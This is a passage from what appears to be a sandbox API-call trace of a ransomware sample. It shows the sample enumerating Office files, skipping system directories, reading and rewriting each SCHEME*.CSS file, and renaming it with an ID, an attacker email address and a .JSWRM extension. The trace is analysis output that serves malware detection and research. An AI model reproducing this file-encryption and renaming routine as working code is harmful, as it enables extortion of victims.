hHeap=0x1e0000) returned 1 [0117.427] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xab7525c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xab7525c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xab9b4b8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e088, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME27.CSS", cAlternateFileName="")) returned 1 [0117.427] lstrcmpiW (lpString1="SCHEME27.CSS", lpString2=".") returned 1 [0117.428] lstrcmpiW (lpString1="SCHEME27.CSS", lpString2="..") returned 1 [0117.428] lstrcmpiW (lpString1="SCHEME27.CSS", lpString2="...") returned 1 [0117.428] lstrcmpiW (lpString1="SCHEME27.CSS", lpString2="windows") returned -1 [0117.428] lstrcmpiW (lpString1="SCHEME27.CSS", lpString2="recovery") returned 1 [0117.428] lstrcmpiW (lpString1="SCHEME27.CSS", lpString2="perflogs") returned 1 [0117.428] lstrcmpiW (lpString1="SCHEME27.CSS", lpString2="documents and settings") returned 1 [0117.428] lstrcmpiW (lpString1="SCHEME27.CSS", lpString2="$RECYCLE.BIN") returned 1 [0117.428] lstrcmpiW (lpString1="SCHEME27.CSS", lpString2="system volume information") returned -1 [0117.428] lstrcmpiW (lpString1="SCHEME27.CSS", lpString2="msocache") returned 1 [0117.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0117.428] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME27.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.428] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME27.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME27.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0117.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0117.428] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME27.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.428] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME27.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME27.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0117.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0117.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0117.428] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.428] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0117.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0117.428] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME27.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme27.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0117.435] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=123016) returned 1 [0117.435] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e080) returned 0x24c1d0 [0117.435] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1e080, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1e080, lpOverlapped=0x0) returned 1 [0117.449] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.449] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1e080, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1e080, lpOverlapped=0x0) returned 1 [0117.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0117.449] CloseHandle (hObject=0x314) returned 1 [0117.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0117.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0117.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0117.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0117.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0117.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0117.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0117.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0117.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0117.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0117.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0117.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0117.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0117.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0117.450] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME27.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme27.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME27.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme27.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0117.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0117.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0117.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0117.453] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xab7525c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xab7525c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xab9b4b8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d754, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME28.CSS", cAlternateFileName="")) returned 1 [0117.453] lstrcmpiW (lpString1="SCHEME28.CSS", lpString2=".") returned 1 [0117.453] lstrcmpiW (lpString1="SCHEME28.CSS", lpString2="..") returned 1 [0117.453] lstrcmpiW (lpString1="SCHEME28.CSS", lpString2="...") returned 1 [0117.453] lstrcmpiW (lpString1="SCHEME28.CSS", lpString2="windows") returned -1 [0117.453] lstrcmpiW (lpString1="SCHEME28.CSS", lpString2="recovery") returned 1 [0117.453] lstrcmpiW (lpString1="SCHEME28.CSS", lpString2="perflogs") returned 1 [0117.453] lstrcmpiW (lpString1="SCHEME28.CSS", lpString2="documents and settings") returned 1 [0117.453] lstrcmpiW (lpString1="SCHEME28.CSS", lpString2="$RECYCLE.BIN") returned 1 [0117.453] lstrcmpiW (lpString1="SCHEME28.CSS", lpString2="system volume information") returned -1 [0117.453] lstrcmpiW (lpString1="SCHEME28.CSS", lpString2="msocache") returned 1 [0117.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0117.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME28.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME28.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME28.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0117.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0117.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME28.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME28.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME28.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0117.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0117.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0117.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0117.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0117.454] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME28.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme28.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0117.454] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=120660) returned 1 [0117.454] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1d750) returned 0x24c1d0 [0117.454] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1d750, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1d750, lpOverlapped=0x0) returned 1 [0117.467] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.467] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1d750, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1d750, lpOverlapped=0x0) returned 1 [0117.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0117.467] CloseHandle (hObject=0x314) returned 1 [0117.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0117.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0117.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0117.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0117.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0117.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0117.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0117.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0117.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0117.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0117.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0117.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0117.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0117.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0117.468] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME28.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme28.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME28.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme28.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0117.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0117.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0117.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0117.469] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xab7525c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xab7525c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xab9b4b8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1eb4a, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME29.CSS", cAlternateFileName="")) returned 1 [0117.469] lstrcmpiW (lpString1="SCHEME29.CSS", lpString2=".") returned 1 [0117.469] lstrcmpiW (lpString1="SCHEME29.CSS", lpString2="..") returned 1 [0117.469] lstrcmpiW (lpString1="SCHEME29.CSS", lpString2="...") returned 1 [0117.469] lstrcmpiW (lpString1="SCHEME29.CSS", lpString2="windows") returned -1 [0117.469] lstrcmpiW (lpString1="SCHEME29.CSS", lpString2="recovery") returned 1 [0117.469] lstrcmpiW (lpString1="SCHEME29.CSS", lpString2="perflogs") returned 1 [0117.469] lstrcmpiW (lpString1="SCHEME29.CSS", lpString2="documents and settings") returned 1 [0117.469] lstrcmpiW (lpString1="SCHEME29.CSS", lpString2="$RECYCLE.BIN") returned 1 [0117.469] lstrcmpiW (lpString1="SCHEME29.CSS", lpString2="system volume information") returned -1 [0117.469] lstrcmpiW (lpString1="SCHEME29.CSS", lpString2="msocache") returned 1 [0117.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0117.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME29.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME29.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME29.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0117.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0117.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME29.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME29.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME29.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0117.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0117.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0117.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0117.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0117.470] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME29.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme29.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0117.470] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=125770) returned 1 [0117.470] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1eb40) returned 0x24c1d0 [0117.470] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1eb40, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1eb40, lpOverlapped=0x0) returned 1 [0117.494] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.494] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1eb40, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1eb40, lpOverlapped=0x0) returned 1 [0117.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0117.495] CloseHandle (hObject=0x314) returned 1 [0117.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0117.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0117.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0117.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0117.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0117.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0117.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0117.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0117.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0117.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0117.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0117.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0117.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0117.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0117.495] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME29.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme29.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME29.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme29.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0117.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0117.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0117.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0117.497] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xab7525c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xab7525c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xab7525c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d522, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME30.CSS", cAlternateFileName="")) returned 1 [0117.497] lstrcmpiW (lpString1="SCHEME30.CSS", lpString2=".") returned 1 [0117.497] lstrcmpiW (lpString1="SCHEME30.CSS", lpString2="..") returned 1 [0117.497] lstrcmpiW (lpString1="SCHEME30.CSS", lpString2="...") returned 1 [0117.497] lstrcmpiW (lpString1="SCHEME30.CSS", lpString2="windows") returned -1 [0117.497] lstrcmpiW (lpString1="SCHEME30.CSS", lpString2="recovery") returned 1 [0117.497] lstrcmpiW (lpString1="SCHEME30.CSS", lpString2="perflogs") returned 1 [0117.497] lstrcmpiW (lpString1="SCHEME30.CSS", lpString2="documents and settings") returned 1 [0117.497] lstrcmpiW (lpString1="SCHEME30.CSS", lpString2="$RECYCLE.BIN") returned 1 [0117.497] lstrcmpiW (lpString1="SCHEME30.CSS", lpString2="system volume information") returned -1 [0117.497] lstrcmpiW (lpString1="SCHEME30.CSS", lpString2="msocache") returned 1 [0117.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0117.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME30.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.497] WideCharToMultiByte (in: CodePage=0xfde9, 